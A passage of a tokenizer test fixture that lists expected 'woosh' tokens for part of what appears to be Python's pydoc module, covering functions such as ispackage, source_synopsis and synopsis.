woosh.Token(woosh.OP, '}', 312, 23, 312, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 312, 24, 313, 0),
woosh.Token(woosh.DEDENT, ' ', 313, 0, 313, 4),
woosh.Token(woosh.NAME, 'keyfunc', 313, 4, 313, 11),
woosh.Token(woosh.OP, '=', 313, 12, 313, 13),
woosh.Token(woosh.NAME, 'lambda', 313, 14, 313, 20),
woosh.Token(woosh.NAME, 'attr', 313, 21, 313, 25),
woosh.Token(woosh.OP, ':', 313, 25, 313, 26),
woosh.Token(woosh.OP, '(', 313, 27, 313, 28),
woosh.Token(woosh.NAME, 'field_order', 313, 28, 313, 39),
woosh.Token(woosh.OP, '.', 313, 39, 313, 40),
woosh.Token(woosh.NAME, 'get', 313, 40, 313, 43),
woosh.Token(woosh.OP, '(', 313, 43, 313, 44),
woosh.Token(woosh.NAME, 'attr', 313, 44, 313, 48),
woosh.Token(woosh.OP, '[', 313, 48, 313, 49),
woosh.Token(woosh.NUMBER, '0', 313, 49, 313, 50),
woosh.Token(woosh.OP, ']', 313, 50, 313, 51),
woosh.Token(woosh.OP, ',', 313, 51, 313, 52),
woosh.Token(woosh.NUMBER, '0', 313, 53, 313, 54),
woosh.Token(woosh.OP, ')', 313, 54, 313, 55),
woosh.Token(woosh.OP, ',', 313, 55, 313, 56),
woosh.Token(woosh.NAME, 'attr', 313, 57, 313, 61),
woosh.Token(woosh.OP, '[', 313, 61, 313, 62),
woosh.Token(woosh.NUMBER, '0', 313, 62, 313, 63),
woosh.Token(woosh.OP, ']', 313, 63, 313, 64),
woosh.Token(woosh.OP, ')', 313, 64, 313, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 313, 65, 314, 0),
woosh.Token(woosh.NAME, 'attrs', 314, 4, 314, 9),
woosh.Token(woosh.OP, '.', 314, 9, 314, 10),
woosh.Token(woosh.NAME, 'sort', 314, 10, 314, 14),
woosh.Token(woosh.OP, '(', 314, 14, 314, 15),
woosh.Token(woosh.NAME, 'key', 314, 15, 314, 18),
woosh.Token(woosh.OP, '=', 314, 18, 314, 19),
woosh.Token(woosh.NAME, 'keyfunc', 314, 19, 314, 26),
woosh.Token(woosh.OP, ')', 314, 26, 314, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 314, 27, 315, 0),
woosh.Token(woosh.COMMENT, '# ----------------------------------------------------- module manipulation', 316, 0, 316, 75),
woosh.Token(woosh.DEDENT, '', 318, 0, 318, 0),
woosh.Token(woosh.NAME, 'def', 318, 0, 318, 3),
woosh.Token(woosh.NAME, 'ispackage', 318, 4, 318, 13),
woosh.Token(woosh.OP, '(', 318, 13, 318, 14),
woosh.Token(woosh.NAME, 'path', 318, 14, 318, 18),
woosh.Token(woosh.OP, ')', 318, 18, 318, 19),
woosh.Token(woosh.OP, ':', 318, 19, 318, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 318, 20, 319, 0),
woosh.Token(woosh.INDENT, ' ', 319, 0, 319, 4),
woosh.Token(woosh.STRING, '"""Guess whether a path refers to a package directory."""', 319, 4, 319, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 319, 61, 320, 0),
woosh.Token(woosh.NAME, 'if', 320, 4, 320, 6),
woosh.Token(woosh.NAME, 'os', 320, 7, 320, 9),
woosh.Token(woosh.OP, '.', 320, 9, 320, 10),
woosh.Token(woosh.NAME, 'path', 320, 10, 320, 14),
woosh.Token(woosh.OP, '.', 320, 14, 320, 15),
woosh.Token(woosh.NAME, 'isdir', 320, 15, 320, 20),
woosh.Token(woosh.OP, '(', 320, 20, 320, 21),
woosh.Token(woosh.NAME, 'path', 320, 21, 320, 25),
woosh.Token(woosh.OP, ')', 320, 25, 320, 26),
woosh.Token(woosh.OP, ':', 320, 26, 320, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 320, 27, 321, 0),
woosh.Token(woosh.INDENT, ' ', 321, 0, 321, 8),
woosh.Token(woosh.NAME, 'for', 321, 8, 321, 11),
woosh.Token(woosh.NAME, 'ext', 321, 12, 321, 15),
woosh.Token(woosh.NAME, 'in', 321, 16, 321, 18),
woosh.Token(woosh.OP, '(', 321, 19, 321, 20),
woosh.Token(woosh.STRING, "'.py'", 321, 20, 321, 25),
woosh.Token(woosh.OP, ',', 321, 25, 321, 26),
woosh.Token(woosh.STRING, "'.pyc'", 321, 27, 321, 33),
woosh.Token(woosh.OP, ')', 321, 33, 321, 34),
woosh.Token(woosh.OP, ':', 321, 34, 321, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 321, 35, 322, 0),
woosh.Token(woosh.INDENT, ' ', 322, 0, 322, 12),
woosh.Token(woosh.NAME, 'if', 322, 12, 322, 14),
woosh.Token(woosh.NAME, 'os', 322, 15, 322, 17),
woosh.Token(woosh.OP, '.', 322, 17, 322, 18),
woosh.Token(woosh.NAME, 'path', 322, 18, 322, 22),
woosh.Token(woosh.OP, '.', 322, 22, 322, 23),
woosh.Token(woosh.NAME, 'isfile', 322, 23, 322, 29),
woosh.Token(woosh.OP, '(', 322, 29, 322, 30),
woosh.Token(woosh.NAME, 'os', 322, 30, 322, 32),
woosh.Token(woosh.OP, '.', 322, 32, 322, 33),
woosh.Token(woosh.NAME, 'path', 322, 33, 322, 37),
woosh.Token(woosh.OP, '.', 322, 37, 322, 38),
woosh.Token(woosh.NAME, 'join', 322, 38, 322, 42),
woosh.Token(woosh.OP, '(', 322, 42, 322, 43),
woosh.Token(woosh.NAME, 'path', 322, 43, 322, 47),
woosh.Token(woosh.OP, ',', 322, 47, 322, 48),
woosh.Token(woosh.STRING, "'__init__'", 322, 49, 322, 59),
woosh.Token(woosh.OP, '+', 322, 60, 322, 61),
woosh.Token(woosh.NAME, 'ext', 322, 62, 322, 65),
woosh.Token(woosh.OP, ')', 322, 65, 322, 66),
woosh.Token(woosh.OP, ')', 322, 66, 322, 67),
woosh.Token(woosh.OP, ':', 322, 67, 322, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 322, 68, 323, 0),
woosh.Token(woosh.INDENT, ' ', 323, 0, 323, 16),
woosh.Token(woosh.NAME, 'return', 323, 16, 323, 22),
woosh.Token(woosh.NAME, 'True', 323, 23, 323, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 323, 27, 324, 0),
woosh.Token(woosh.DEDENT, ' ', 324, 0, 324, 4),
woosh.Token(woosh.DEDENT, '', 324, 4, 324, 4),
woosh.Token(woosh.DEDENT, '', 324, 4, 324, 4),
woosh.Token(woosh.NAME, 'return', 324, 4, 324, 10),
woosh.Token(woosh.NAME, 'False', 324, 11, 324, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 324, 16, 325, 0),
woosh.Token(woosh.DEDENT, '', 326, 0, 326, 0),
woosh.Token(woosh.NAME, 'def', 326, 0, 326, 3),
woosh.Token(woosh.NAME, 'source_synopsis', 326, 4, 326, 19),
woosh.Token(woosh.OP, '(', 326, 19, 326, 20),
woosh.Token(woosh.NAME, 'file', 326, 20, 326, 24),
woosh.Token(woosh.OP, ')', 326, 24, 326, 25),
woosh.Token(woosh.OP, ':', 326, 25, 326, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 326, 26, 327, 0),
woosh.Token(woosh.INDENT, ' ', 327, 0, 327, 4),
woosh.Token(woosh.NAME, 'line', 327, 4, 327, 8),
woosh.Token(woosh.OP, '=', 327, 9, 327, 10),
woosh.Token(woosh.NAME, 'file', 327, 11, 327, 15),
woosh.Token(woosh.OP, '.', 327, 15, 327, 16),
woosh.Token(woosh.NAME, 'readline', 327, 16, 327, 24),
woosh.Token(woosh.OP, '(', 327, 24, 327, 25),
woosh.Token(woosh.OP, ')', 327, 25, 327, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 327, 26, 328, 0),
woosh.Token(woosh.NAME, 'while', 328, 4, 328, 9),
woosh.Token(woosh.NAME, 'line', 328, 10, 328, 14),
woosh.Token(woosh.OP, '[', 328, 14, 328, 15),
woosh.Token(woosh.OP, ':', 328, 15, 328, 16),
woosh.Token(woosh.NUMBER, '1', 328, 16, 328, 17),
woosh.Token(woosh.OP, ']', 328, 17, 328, 18),
woosh.Token(woosh.OP, '==', 328, 19, 328, 21),
woosh.Token(woosh.STRING, "'#'", 328, 22, 328, 25),
woosh.Token(woosh.NAME, 'or', 328, 26, 328, 28),
woosh.Token(woosh.NAME, 'not', 328, 29, 328, 32),
woosh.Token(woosh.NAME, 'line', 328, 33, 328, 37),
woosh.Token(woosh.OP, '.', 328, 37, 328, 38),
woosh.Token(woosh.NAME, 'strip', 328, 38, 328, 43),
woosh.Token(woosh.OP, '(', 328, 43, 328, 44),
woosh.Token(woosh.OP, ')', 328, 44, 328, 45),
woosh.Token(woosh.OP, ':', 328, 45, 328, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 328, 46, 329, 0),
woosh.Token(woosh.INDENT, ' ', 329, 0, 329, 8),
woosh.Token(woosh.NAME, 'line', 329, 8, 329, 12),
woosh.Token(woosh.OP, '=', 329, 13, 329, 14),
woosh.Token(woosh.NAME, 'file', 329, 15, 329, 19),
woosh.Token(woosh.OP, '.', 329, 19, 329, 20),
woosh.Token(woosh.NAME, 'readline', 329, 20, 329, 28),
woosh.Token(woosh.OP, '(', 329, 28, 329, 29),
woosh.Token(woosh.OP, ')', 329, 29, 329, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 329, 30, 330, 0),
woosh.Token(woosh.NAME, 'if', 330, 8, 330, 10),
woosh.Token(woosh.NAME, 'not', 330, 11, 330, 14),
woosh.Token(woosh.NAME, 'line', 330, 15, 330, 19),
woosh.Token(woosh.OP, ':', 330, 19, 330, 20),
woosh.Token(woosh.NAME, 'break', 330, 21, 330, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 330, 26, 331, 0),
woosh.Token(woosh.DEDENT, ' ', 331, 0, 331, 4),
woosh.Token(woosh.NAME, 'line', 331, 4, 331, 8),
woosh.Token(woosh.OP, '=', 331, 9, 331, 10),
woosh.Token(woosh.NAME, 'line', 331, 11, 331, 15),
woosh.Token(woosh.OP, '.', 331, 15, 331, 16),
woosh.Token(woosh.NAME, 'strip', 331, 16, 331, 21),
woosh.Token(woosh.OP, '(', 331, 21, 331, 22),
woosh.Token(woosh.OP, ')', 331, 22, 331, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 331, 23, 332, 0),
woosh.Token(woosh.NAME, 'if', 332, 4, 332, 6),
woosh.Token(woosh.NAME, 'line', 332, 7, 332, 11),
woosh.Token(woosh.OP, '[', 332, 11, 332, 12),
woosh.Token(woosh.OP, ':', 332, 12, 332, 13),
woosh.Token(woosh.NUMBER, '4', 332, 13, 332, 14),
woosh.Token(woosh.OP, ']', 332, 14, 332, 15),
woosh.Token(woosh.OP, '==', 332, 16, 332, 18),
woosh.Token(woosh.STRING, '\'r"""\'', 332, 19, 332, 25),
woosh.Token(woosh.OP, ':', 332, 25, 332, 26),
woosh.Token(woosh.NAME, 'line', 332, 27, 332, 31),
woosh.Token(woosh.OP, '=', 332, 32, 332, 33),
woosh.Token(woosh.NAME, 'line', 332, 34, 332, 38),
woosh.Token(woosh.OP, '[', 332, 38, 332, 39),
woosh.Token(woosh.NUMBER, '1', 332, 39, 332, 40),
woosh.Token(woosh.OP, ':', 332, 40, 332, 41),
woosh.Token(woosh.OP, ']', 332, 41, 332, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 332, 42, 333, 0),
woosh.Token(woosh.NAME, 'if', 333, 4, 333, 6),
woosh.Token(woosh.NAME, 'line', 333, 7, 333, 11),
woosh.Token(woosh.OP, '[', 333, 11, 333, 12),
woosh.Token(woosh.OP, ':', 333, 12, 333, 13),
woosh.Token(woosh.NUMBER, '3', 333, 13, 333, 14),
woosh.Token(woosh.OP, ']', 333, 14, 333, 15),
woosh.Token(woosh.OP, '==', 333, 16, 333, 18),
woosh.Token(woosh.STRING, '\'"""\'', 333, 19, 333, 24),
woosh.Token(woosh.OP, ':', 333, 24, 333, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 333, 25, 334, 0),
woosh.Token(woosh.INDENT, ' ', 334, 0, 334, 8),
woosh.Token(woosh.NAME, 'line', 334, 8, 334, 12),
woosh.Token(woosh.OP, '=', 334, 13, 334, 14),
woosh.Token(woosh.NAME, 'line', 334, 15, 334, 19),
woosh.Token(woosh.OP, '[', 334, 19, 334, 20),
woosh.Token(woosh.NUMBER, '3', 334, 20, 334, 21),
woosh.Token(woosh.OP, ':', 334, 21, 334, 22),
woosh.Token(woosh.OP, ']', 334, 22, 334, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 334, 23, 335, 0),
woosh.Token(woosh.NAME, 'if', 335, 8, 335, 10),
woosh.Token(woosh.NAME, 'line', 335, 11, 335, 15),
woosh.Token(woosh.OP, '[', 335, 15, 335, 16),
woosh.Token(woosh.OP, '-', 335, 16, 335, 17),
woosh.Token(woosh.NUMBER, '1', 335, 17, 335, 18),
woosh.Token(woosh.OP, ':', 335, 18, 335, 19),
woosh.Token(woosh.OP, ']', 335, 19, 335, 20),
woosh.Token(woosh.OP, '==', 335, 21, 335, 23),
woosh.Token(woosh.STRING, "'\\\\'", 335, 24, 335, 28),
woosh.Token(woosh.OP, ':', 335, 28, 335, 29),
woosh.Token(woosh.NAME, 'line', 335, 30, 335, 34),
woosh.Token(woosh.OP, '=', 335, 35, 335, 36),
woosh.Token(woosh.NAME, 'line', 335, 37, 335, 41),
woosh.Token(woosh.OP, '[', 335, 41, 335, 42),
woosh.Token(woosh.OP, ':', 335, 42, 335, 43),
woosh.Token(woosh.OP, '-', 335, 43, 335, 44),
woosh.Token(woosh.NUMBER, '1', 335, 44, 335, 45),
woosh.Token(woosh.OP, ']', 335, 45, 335, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 335, 46, 336, 0),
woosh.Token(woosh.NAME, 'while', 336, 8, 336, 13),
woosh.Token(woosh.NAME, 'not', 336, 14, 336, 17),
woosh.Token(woosh.NAME, 'line', 336, 18, 336, 22),
woosh.Token(woosh.OP, '.', 336, 22, 336, 23),
woosh.Token(woosh.NAME, 'strip', 336, 23, 336, 28),
woosh.Token(woosh.OP, '(', 336, 28, 336, 29),
woosh.Token(woosh.OP, ')', 336, 29, 336, 30),
woosh.Token(woosh.OP, ':', 336, 30, 336, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 336, 31, 337, 0),
woosh.Token(woosh.INDENT, ' ', 337, 0, 337, 12),
woosh.Token(woosh.NAME, 'line', 337, 12, 337, 16),
woosh.Token(woosh.OP, '=', 337, 17, 337, 18),
woosh.Token(woosh.NAME, 'file', 337, 19, 337, 23),
woosh.Token(woosh.OP, '.', 337, 23, 337, 24),
woosh.Token(woosh.NAME, 'readline', 337, 24, 337, 32),
woosh.Token(woosh.OP, '(', 337, 32, 337, 33),
woosh.Token(woosh.OP, ')', 337, 33, 337, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 337, 34, 338, 0),
woosh.Token(woosh.NAME, 'if', 338, 12, 338, 14),
woosh.Token(woosh.NAME, 'not', 338, 15, 338, 18),
woosh.Token(woosh.NAME, 'line', 338, 19, 338, 23),
woosh.Token(woosh.OP, ':', 338, 23, 338, 24),
woosh.Token(woosh.NAME, 'break', 338, 25, 338, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 338, 30, 339, 0),
woosh.Token(woosh.DEDENT, ' ', 339, 0, 339, 8),
woosh.Token(woosh.NAME, 'result', 339, 8, 339, 14),
woosh.Token(woosh.OP, '=', 339, 15, 339, 16),
woosh.Token(woosh.NAME, 'line', 339, 17, 339, 21),
woosh.Token(woosh.OP, '.', 339, 21, 339, 22),
woosh.Token(woosh.NAME, 'split', 339, 22, 339, 27),
woosh.Token(woosh.OP, '(', 339, 27, 339, 28),
woosh.Token(woosh.STRING, '\'"""\'', 339, 28, 339, 33),
woosh.Token(woosh.OP, ')', 339, 33, 339, 34),
woosh.Token(woosh.OP, '[', 339, 34, 339, 35),
woosh.Token(woosh.NUMBER, '0', 339, 35, 339, 36),
woosh.Token(woosh.OP, ']', 339, 36, 339, 37),
woosh.Token(woosh.OP, '.', 339, 37, 339, 38),
woosh.Token(woosh.NAME, 'strip', 339, 38, 339, 43),
woosh.Token(woosh.OP, '(', 339, 43, 339, 44),
woosh.Token(woosh.OP, ')', 339, 44, 339, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 339, 45, 340, 0),
woosh.Token(woosh.DEDENT, ' ', 340, 0, 340, 4),
woosh.Token(woosh.NAME, 'else', 340, 4, 340, 8),
woosh.Token(woosh.OP, ':', 340, 8, 340, 9),
woosh.Token(woosh.NAME, 'result', 340, 10, 340, 16),
woosh.Token(woosh.OP, '=', 340, 17, 340, 18),
woosh.Token(woosh.NAME, 'None', 340, 19, 340, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 340, 23, 341, 0),
woosh.Token(woosh.NAME, 'return', 341, 4, 341, 10),
woosh.Token(woosh.NAME, 'result', 341, 11, 341, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 341, 17, 342, 0),
woosh.Token(woosh.DEDENT, '', 343, 0, 343, 0),
woosh.Token(woosh.NAME, 'def', 343, 0, 343, 3),
woosh.Token(woosh.NAME, 'synopsis', 343, 4, 343, 12),
woosh.Token(woosh.OP, '(', 343, 12, 343, 13),
woosh.Token(woosh.NAME, 'filename', 343, 13, 343, 21),
woosh.Token(woosh.OP, ',', 343, 21, 343, 22),
woosh.Token(woosh.NAME, 'cache', 343, 23, 343, 28),
woosh.Token(woosh.OP, '=', 343, 28, 343, 29),
woosh.Token(woosh.OP, '{', 343, 29, 343, 30),
woosh.Token(woosh.OP, '}', 343, 30, 343, 31),
woosh.Token(woosh.OP, ')', 343, 31, 343, 32),
woosh.Token(woosh.OP, ':', 343, 32, 343, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 343, 33, 344, 0),
woosh.Token(woosh.INDENT, ' ', 344, 0, 344, 4),
woosh.Token(woosh.STRING, '"""Get the one-line summary out of a module file."""', 344, 4, 344, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 344, 56, 345, 0),
woosh.Token(woosh.NAME, 'mtime', 345, 4, 345, 9),
woosh.Token(woosh.OP, '=', 345, 10, 345, 11),
woosh.Token(woosh.NAME, 'os', 345, 12, 345, 14),
woosh.Token(woosh.OP, '.', 345, 14, 345, 15),
woosh.Token(woosh.NAME, 'stat', 345, 15, 345, 19),
woosh.Token(woosh.OP, '(', 345, 19, 345, 20),
woosh.Token(woosh.NAME, 'filename', 345, 20, 345, 28),
woosh.Token(woosh.OP, ')', 345, 28, 345, 29),
woosh.Token(woosh.OP, '.', 345, 29, 345, 30),
woosh.Token(woosh.NAME, 'st_mtime', 345, 30, 345, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 345, 38, 346, 0),
woosh.Token(woosh.NAME, 'lastupdate', 346, 4, 346, 14),
woosh.Token(woosh.OP, ',', 346, 14, 346, 15),
woosh.Token(woosh.NAME, 'result', 346, 16, 346, 22),
woosh.Token(woosh.OP, '=', 346, 23, 346, 24),
woosh.Token(woosh.NAME, 'cache', 346, 25, 346, 30),
woosh.Token(woosh.OP, '.', 346, 30, 346, 31),
woosh.Token(woosh.NAME, 'get', 346, 31, 346, 34),
woosh.Token(woosh.OP, '(', 346, 34, 346, 35),
woosh.Token(woosh.NAME, 'filename', 346, 35, 346, 43),
woosh.Token(woosh.OP, ',', 346, 43, 346, 44),
woosh.Token(woosh.OP, '(', 346, 45, 346, 46),
woosh.Token(woosh.NAME, 'None', 346, 46, 346, 50),
woosh.Token(woosh.OP, ',', 346, 50, 346, 51),
woosh.Token(woosh.NAME, 'None', 346, 52, 346, 56),
woosh.Token(woosh.OP, ')', 346, 56, 346, 57),
woosh.Token(woosh.OP, ')', 346, 57, 346, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 346, 58, 347, 0),
woosh.Token(woosh.NAME, 'if', 347, 4, 347, 6),
woosh.Token(woosh.NAME, 'lastupdate', 347, 7, 347, 17),
woosh.Token(woosh.NAME, 'is', 347, 18, 347, 20),
woosh.Token(woosh.NAME, 'None', 347, 21, 347, 25),
woosh.Token(woosh.NAME, 'or', 347, 26, 347, 28),
woosh.Token(woosh.NAME, 'lastupdate', 347, 29, 347, 39),
woosh.Token(woosh.OP, '<', 347, 40, 347, 41),
woosh.Token(woosh.NAME, 'mtime', 347, 42, 347, 47),
woosh.Token(woosh.OP, ':', 347, 47, 347, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 347, 48, 348, 0),
woosh.Token(woosh.COMMENT, '# Look for binary suffixes first, falling back to source.', 348, 8, 348, 65),
woosh.Token(woosh.INDENT, ' ', 349, 0, 349, 8),
woosh.Token(woosh.NAME, 'if', 349, 8, 349, 10),
woosh.Token(woosh.NAME, 'filename', 349, 11, 349, 19),
woosh.Token(woosh.OP, '.', 349, 19, 349, 20),
woosh.Token(woosh.NAME, 'endswith', 349, 20, 349, 28),
woosh.Token(woosh.OP, '(', 349, 28, 349, 29),
woosh.Token(woosh.NAME, 'tuple', 349, 29, 349, 34),
woosh.Token(woosh.OP, '(', 349, 34, 349, 35),
woosh.Token(woosh.NAME, 'importlib', 349, 35, 349, 44),
woosh.Token(woosh.OP, '.', 349, 44, 349, 45),
woosh.Token(woosh.NAME, 'machinery', 349, 45, 349, 54),
woosh.Token(woosh.OP, '.', 349, 54, 349, 55),
woosh.Token(woosh.NAME, 'BYTECODE_SUFFIXES', 349, 55, 349, 72),
woosh.Token(woosh.OP, ')', 349, 72, 349, 73),
woosh.Token(woosh.OP, ')', 349, 73, 349, 74),
woosh.Token(woosh.OP, ':', 349, 74, 349, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 349, 75, 350, 0),
woosh.Token(woosh.INDENT, ' ', 350, 0, 350, 12),
woosh.Token(woosh.NAME, 'loader_cls', 350, 12, 350, 22),
woosh.Token(woosh.OP, '=', 350, 23, 350, 24),
woosh.Token(woosh.NAME, 'importlib', 350, 25, 350, 34),
woosh.Token(woosh.OP, '.', 350, 34, 350, 35),
woosh.Token(woosh.NAME, 'machinery', 350, 35, 350, 44),
woosh.Token(woosh.OP, '.', 350, 44, 350, 45),
woosh.Token(woosh.NAME, 'SourcelessFileLoader', 350, 45, 350, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 350, 65, 351, 0),
woosh.Token(woosh.DEDENT, ' ', 351, 0, 351, 8),
woosh.Token(woosh.NAME, 'elif', 351, 8, 351, 12),
woosh.Token(woosh.NAME, 'filename', 351, 13, 351, 21),
woosh.Token(woosh.OP, '.', 351, 21, 351, 22),
woosh.Token(woosh.NAME, 'endswith', 351, 22, 351, 30),
woosh.Token(woosh.OP, '(', 351, 30, 351, 31),
woosh.Token(woosh.NAME, 'tuple', 351, 31, 351, 36),
woosh.Token(woosh.OP, '(', 351, 36, 351, 37),
woosh.Token(woosh.NAME, 'importlib', 351, 37, 351, 46),
woosh.Token(woosh.OP, '.', 351, 46, 351, 47),
woosh.Token(woosh.NAME, 'machinery', 351, 47, 351, 56),
woosh.Token(woosh.OP, '.', 351, 56, 351, 57),
woosh.Token(woosh.NAME, 'EXTENSION_SUFFIXES', 351, 57, 351, 75),
woosh.Token(woosh.OP, ')', 351, 75, 351, 76),
woosh.Token(woosh.OP, ')', 351, 76, 351, 77),
woosh.Token(woosh.OP, ':', 351, 77, 351, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 351, 78, 352, 0),
woosh.Token(woosh.INDENT, ' ', 352, 0, 352, 12),
woosh.Token(woosh.NAME, 'loader_cls', 352, 12, 352, 22),
woosh.Token(woosh.OP, '=', 352, 23, 352, 24),
woosh.Token(woosh.NAME, 'importlib', 352, 25, 352, 34),
woosh.Token(woosh.OP, '.', 352, 34, 352, 35),
woosh.Token(woosh.NAME, 'machinery', 352, 35, 352, 44),
woosh.Token(woosh.OP, '.', 352, 44, 352, 45),
woosh.Token(woosh.NAME, 'ExtensionFileLoader', 352, 45, 352, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 352, 64, 353, 0),
woosh.Token(woosh.DEDENT, ' ', 353, 0, 353, 8),
woosh.Token(woosh.NAME, 'else', 353, 8, 353, 12),
woosh.Token(woosh.OP, ':', 353, 12, 353, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 353, 13, 354, 0),
woosh.Token(woosh.INDENT, ' ', 354, 0, 354, 12),
woosh.Token(woosh.NAME, 'loader_cls', 354, 12, 354, 22),
woosh.Token(woosh.OP, '=', 354, 23, 354, 24),
woosh.Token(woosh.NAME, 'None', 354, 25, 354, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 354, 29, 355, 0),
woosh.Token(woosh.COMMENT, '# Now handle the choice.', 355, 8, 355, 32),
woosh.Token(woosh.DEDENT, ' ', 356, 0, 356, 8),
woosh.Token(woosh.NAME, 'if', 356, 8, 356, 10),
woosh.Token(woosh.NAME, 'loader_cls', 356, 11, 356, 21),
woosh.Token(woosh.NAME, 'is', 356, 22, 356, 24),
woosh.Token(woosh.NAME, 'None', 356, 25, 356, 29),
woosh.Token(woosh.OP, ':', 356, 29, 356, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 356, 30, 357, 0),
woosh.Token(woosh.COMMENT, '# Must be a source file.', 357, 12, 357, 36),
woosh.Token(woosh.INDENT, ' ', 358, 0, 358, 12),
woosh.Token(woosh.NAME, 'try', 358, 12, 358, 15),
woosh.Token(woosh.OP, ':', 358, 15, 358, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 358, 16, 359, 0),
woosh.Token(woosh.INDENT, ' ', 359, 0, 359, 16),
woosh.Token(woosh.NAME, 'file', 359, 16, 359, 20),
woosh.Token(woosh.OP, '=', 359, 21, 359, 22),
woosh.Token(woosh.NAME, 'tokenize', 359, 23, 359, 31),
woosh.Token(woosh.OP, '.', 359, 31, 359, 32),
woosh.Token(woosh.NAME, 'open', 359, 32, 359, 36),
woosh.Token(woosh.OP, '(', 359, 36, 359, 37),
woosh.Token(woosh.NAME, 'filename', 359, 37, 359, 45),
woosh.Token(woosh.OP, ')', 359, 45, 359, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 359, 46, 360, 0),
woosh.Token(woosh.DEDENT, ' ', 360, 0, 360, 12),
woosh.Token(woosh.NAME, 'except', 360, 12, 360, 18),
woosh.Token(woosh.NAME, 'OSError', 360, 19, 360, 26),
woosh.Token(woosh.OP, ':', 360, 26, 360, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 360, 27, 361, 0),
woosh.Token(woosh.COMMENT, "# module can't be opened, so skip it", 361, 16, 361, 52),
woosh.Token(woosh.INDENT, ' ', 362, 0, 362, 16),
woosh.Token(woosh.NAME, 'return', 362, 16, 362, 22),
woosh.Token(woosh.NAME, 'None', 362, 23, 362, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 362, 27, 363, 0),
woosh.Token(woosh.COMMENT, '# text modules can be directly examined', 363, 12, 363, 51),
woosh.Token(woosh.DEDENT, ' ', 364, 0, 364, 12),
woosh.Token(woosh.NAME, 'with', 364, 12, 364, 16),
woosh.Token(woosh.NAME, 'file', 364, 17, 364, 21),
woosh.Token(woosh.OP, ':', 364, 21, 364, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 364, 22, 365, 0),
woosh.Token(woosh.INDENT, ' ', 365, 0, 365, 16),
woosh.Token(woosh.NAME, 'result', 365, 16, 365, 22),
woosh.Token(woosh.OP, '=', 365, 23, 365, 24),
woosh.Token(woosh.NAME, 'source_synopsis', 365, 25, 365, 40),
woosh.Token(woosh.OP, '(', 365, 40, 365, 41),
woosh.Token(woosh.NAME, 'file', 365, 41, 365, 45),
woosh.Token(woosh.OP, ')', 365, 45, 365, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 365, 46, 366, 0),
woosh.Token(woosh.DEDENT, ' ', 366, 0, 366, 8),
woosh.Token(woosh.DEDENT, '', 366, 8, 366, 8),
woosh.Token(woosh.NAME, 'else', 366, 8, 366, 12),
woosh.Token(woosh.OP, ':', 366, 12, 366, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 366, 13, 367, 0),
woosh.Token(woosh.COMMENT, '# Must be a binary module, which has to be imported.', 367, 12, 367, 64),
woosh.Token(woosh.INDENT, ' ', 368, 0, 368, 12),
woosh.Token(woosh.NAME, 'loader', 368, 12, 368, 18),
woosh.Token(woosh.OP, '=', 368, 19, 368, 20),
woosh.Token(woosh.NAME, 'loader_cls', 368, 21, 368, 31),
woosh.Token(woosh.OP, '(', 368, 31, 368, 32),
woosh.Token(woosh.STRING, "'__temp__'", 368, 32, 368, 42),
woosh.Token(woosh.OP, ',', 368, 42, 368, 43),
woosh.Token(woosh.NAME, 'filename', 368, 44, 368, 52),
woosh.Token(woosh.OP, ')', 368, 52, 368, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 368, 53, 369, 0),
woosh.Token(woosh.COMMENT, "# XXX We probably don't need to pass in the loader here.", 369, 12, 369, 68),
woosh.Token(woosh.NAME, 'spec', 370, 12, 370, 16),
woosh.Token(woosh.OP, '=', 370, 17, 370, 18),
woosh.Token(woosh.NAME, 'importlib', 370, 19, 370, 28),
woosh.Token(woosh.OP, '.', 370, 28, 370, 29),
woosh.Token(woosh.NAME, 'util', 370, 29, 370, 33),
woosh.Token(woosh.OP, '.', 370, 33, 370, 34),
woosh.Token(woosh.NAME, 'spec_from_file_location', 370, 34, 370, 57),
woosh.Token(woosh.OP, '(', 370, 57, 370, 58),
woosh.Token(woosh.STRING, "'__temp__'", 370, 58, 370, 68),
woosh.Token(woosh.OP, ',', 370, 68, 370, 69),
woosh.Token(woosh.NAME, 'filename', 370, 70, 370, 78),
woosh.Token(woosh.OP, ',', 370, 78, 370, 79),
woosh.Token(woosh.NAME, 'loader', 371, 58, 371, 64),
